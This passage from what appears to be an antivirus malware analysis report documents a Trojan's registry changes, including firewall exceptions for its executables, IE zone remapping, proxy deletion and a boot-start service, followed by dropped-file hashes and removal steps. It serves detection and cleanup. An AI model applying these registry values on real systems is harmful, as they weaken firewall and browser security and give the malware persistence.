[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process netsh.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 AE 46 36 24 60 B5 26 DD 0F 6F BD B3 1B E2 A6"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"Wuji.exe" = "%Program Files%\Wuji\Wuji.exe:*:Enabled:WJ"
The process netsh.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 44 67 5F 5E 3E AE 95 10 EB DA BE 33 C1 CB 2B"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"update.exe" = "%Program Files%\Wuji\update.exe:*:Enabled:WJU"
The process SportLive.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\sougop]
"HDiskNum" = "00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\System\CurrentControlSet\Services\sougop]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\sougop]
"ErrorControl" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SportLive.exe"
[HKLM\System\CurrentControlSet\Services\sougop]
"StFlag" = "200"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\sougop]
"ImagePath" = "\??\%Program Files%\TogouInputin\Togoupplib.dat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1400392493"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 73 BA 77 D6 3D E1 C8 87 D6 84 32 D0 33 6F 0A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\sougop]
"qid" = "165"
"InstFlag" = "1"
"DisplayName" = "Togoupplib"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\sougop]
"Start" = "2"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MsiExec.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 37 FA 3B 16 EA 71 14 EB 9A 16 E8 A9 6A C9 BF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F FB DB 99 98 F2 8C E4 0F 5A DC 54 52 63 F7 18"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process oemfhsli.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\FhRl]
"Path" = "%Program Files%\fhrl"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\FhRl]
"Exit" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"FhCalendar.exe" = "TODO: "
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 16 2C 5F 74 64 B4 AC E0 3E CF 48 61 45 D7 F5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
4fd79c74d5e8ccc8b11a1d7bc1a0ef94 | c:\Documents and Settings\All Users\Documents\fhrl_6_12001.exe |
e1bc857849dcf7a928dbf96dd364060f | c:\Program Files\Common Files\Install\fhrlsli\oemfhsli.exe |
da61211302dbc86ced4738aff7c7868b | c:\Program Files\fhrl\DuiLib_u.dll |
911d9454d22938b77368a6da6c413313 | c:\Program Files\fhrl\FMDLL.dll |
1854bd1de533fd48ece92216fce57ea6 | c:\Program Files\fhrl\FMDLL32.dll |
ad962279c742cb5f2e32640d160e246c | c:\Program Files\fhrl\FMTest.exe |
97fea0e5059a5bde0cd59a3294ff3bde | c:\Program Files\fhrl\FhCalendar.exe |
a570c326ab7a433647c95b4a4669525b | c:\Program Files\fhrl\Fhuninstall.exe |
8d2cdf0a3c544db534735c8e83842cce | c:\Program Files\fhrl\KillProc.exe |
4e06c6f59cf9204c435cfa22a7abb669 | c:\Program Files\fhrl\Skin\Default\foembin.exe |
81a05de047701a946d8a441ffd08aa1a | c:\Program Files\fhrl\Update.exe |
7c9de379baab0801961a73377a379f14 | c:\Program Files\fhrl\uninst.exe |
349bf98a0025a50bf8e82158a62faeaa | c:\fhsli_6_12001.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Wuji.exe:568
FhCalendar.exe:452
wujiime.exe:464
MSIB.tmp:916
xxdd_165.exe:452
updroots.exe:1016
114gglm_016.exe:488
Update.exe:444
fhrl_6_12001.exe:320
fhsli_6_12001.exe:1852
netsh.exe:436
netsh.exe:628
SportLive.exe:908
MsiExec.exe:1760
oemfhsli.exe:628 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
%Program Files%\fhrl\note.ini (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)
%Program Files%\Wuji\Wuji.exe (7209 bytes)
%Program Files%\Wuji\update.exe (7451 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\æ— æžÂ输入法\æ— æžÂ输入法.lnk (638 bytes)
%Program Files%\Wuji\Wuji.dat (1945 bytes)
%Program Files%\Wuji\uninst.exe (3685 bytes)
%Documents and Settings%\%current user%\Desktop\æ— æžÂ输入法.lnk (626 bytes)
%Program Files%\Wuji\Wuji.dll (2422 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\æ— æžÂ输入法\å¸载无æžÂ输入法.lnk (479 bytes)
%System%\catsrvuz.dll (53 bytes)
%Program Files%\Wuji\Show.dat (5 bytes)
%Program Files%\xxdd\Liveconfig.ini (22 bytes)
%Program Files%\xxdd\xxdd.msi (146581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
%Program Files%\fhrl\Update.log (402 bytes)
%Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)
%Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
%Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\²Ëµ¥bk.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·Èð´Å¥2̬.png (1 bytes)
%Program Files%\fhrl\Skin\test\Àö¯½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
%Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
